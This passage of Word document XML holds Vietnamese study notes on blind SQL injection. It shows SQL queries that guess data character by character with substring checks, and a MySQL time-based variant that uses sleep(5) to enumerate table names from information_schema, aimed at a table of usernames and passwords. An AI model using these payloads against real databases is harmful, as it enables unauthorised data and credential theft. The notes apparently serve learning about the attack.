            <wp:extent cx="5943600" cy="1464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4310"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F593FE" w14:textId="2E02A68D" w:rsidR="00C47E33" w:rsidRDefault="006C307E" w:rsidP="007D74A1">
      <w:r>
        <w:t>Tiếp đến là brute force data bằng câu lệnh sau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BC4BFC" w14:textId="3DF2343A" w:rsidR="006C307E" w:rsidRDefault="006C307E" w:rsidP="007D74A1">
      <w:r w:rsidRPr="006C307E">
        <w:t xml:space="preserve">select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C307E">
        <w:t>id,name</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C307E">
        <w:t xml:space="preserve"> from demo where id=1 and substring((select name from demo OFFSET 1 limit 1),1,1)='t';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCA6A1E" w14:textId="7E9E26BC" w:rsidR="006C307E" w:rsidRDefault="006C307E" w:rsidP="007D74A1">
      <w:r>
        <w:t>Ở đây ta sẽ lấy data thứ 2 là server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1440F09D" w14:textId="1469E1C0" w:rsidR="006C307E" w:rsidRDefault="006C307E" w:rsidP="007D74A1">
      <w:r>
        <w:t>Ta sẽ brute force bằng t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D063EEB" w14:textId="4076E064" w:rsidR="006C307E" w:rsidRDefault="006C307E" w:rsidP="007D74A1">
      <w:r w:rsidRPr="006C307E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="355CEB7D" wp14:editId="32C1661B">
            <wp:extent cx="5943600" cy="1542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2415"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8B3A37" w14:textId="514BA438" w:rsidR="006C307E" w:rsidRDefault="006C307E" w:rsidP="007D74A1">
      <w:r>
        <w:t>Với s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F56984" w14:textId="33601596" w:rsidR="006C307E" w:rsidRDefault="006C307E" w:rsidP="007D74A1">
      <w:r w:rsidRPr="006C307E">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D53F563" wp14:editId="78EA6AE2">
            <wp:extent cx="5943600" cy="164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6555"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1327D5A3" w14:textId="68CC7BDF" w:rsidR="007C36C1" w:rsidRDefault="007C36C1" w:rsidP="007D74A1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3C4043"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3C4043"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Time-based blind</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3C4043"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B905FD" w14:textId="6A7F74A7" w:rsidR="007C36C1" w:rsidRDefault="007C36C1" w:rsidP="007D74A1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3C4043"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3C4043"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Mysql: Ta có table là employee và 2 cột là UName và Pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AB1C7C" w14:textId="69BB7E03" w:rsidR="007C36C1" w:rsidRDefault="007C36C1" w:rsidP="007D74A1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3C4043"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3C4043"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Ta sẽ tiến hành brute force table lệnh sau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF335D6" w14:textId="240D4EE1" w:rsidR="007C36C1" w:rsidRPr="007C36C1" w:rsidRDefault="007C36C1" w:rsidP="007D74A1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3C4043"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C36C1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3C4043"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>select UName from employee where UName='admin' and if(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='e',sleep(5),0);</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="007C36C1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3C4043"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E31865B" wp14:editId="63B2012B">
            <wp:extent cx="5943600" cy="671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1195"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="007C36C1" w:rsidRPr="007C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6907"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="14CE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32E0B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="23A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94E5D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="23166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7698"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FC08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B5"/>
    <w:rsid w:val="00070F7C"/>
    <w:rsid w:val="0014594A"/>
    <w:rsid w:val="001936E0"/>
    <w:rsid w:val="001A3615"/>
    <w:rsid w:val="001B4562"/>
    <w:rsid w:val="002D5706"/>
    <w:rsid w:val="003B5EEA"/>
    <w:rsid w:val="00454BD4"/>
    <w:rsid w:val="006236E2"/>
    <w:rsid w:val="006367D9"/>
    <w:rsid w:val="006454FF"/>
    <w:rsid w:val="006B07C0"/>
    <w:rsid w:val="006C307E"/>
    <w:rsid w:val="006D5D3F"/>
    <w:rsid w:val="0075346B"/>
    <w:rsid w:val="00786BDD"/>
    <w:rsid w:val="007C36C1"/>
    <w:rsid w:val="007D74A1"/>
    <w:rsid w:val="0082540B"/>
    <w:rsid w:val="00897FB5"/>
    <w:rsid w:val="00902FD5"/>
    <w:rsid w:val="0097618A"/>
    <w:rsid w:val="009D1468"/>
    <w:rsid w:val="00A70B7B"/>
    <w:rsid w:val="00AD4F80"/>
    <w:rsid w:val="00C061EF"/>
    <w:rsid w:val="00C47E33"/>
    <w:rsid w:val="00C71D93"/>
    <w:rsid w:val="00C7534F"/>
    <w:rsid w:val="00C923BA"/>
    <w:rsid w:val="00CF5483"/>
    <w:rsid w:val="00D83957"/>
    <w:rsid w:val="00DF2F35"/>
    <w:rsid w:val="00E6706B"/>
    <w:rsid w:val="00EA5A55"/>
    <w:rsid w:val="00ED158E"/>
    <w:rsid w:val="00ED66C7"/>
    <w:rsid w:val="00F5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226E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2963D244-FFC1-40F2-96BE-A6951BA2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69664">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1340112025">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1533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2022-06-14T02:30:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-06-16T04:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>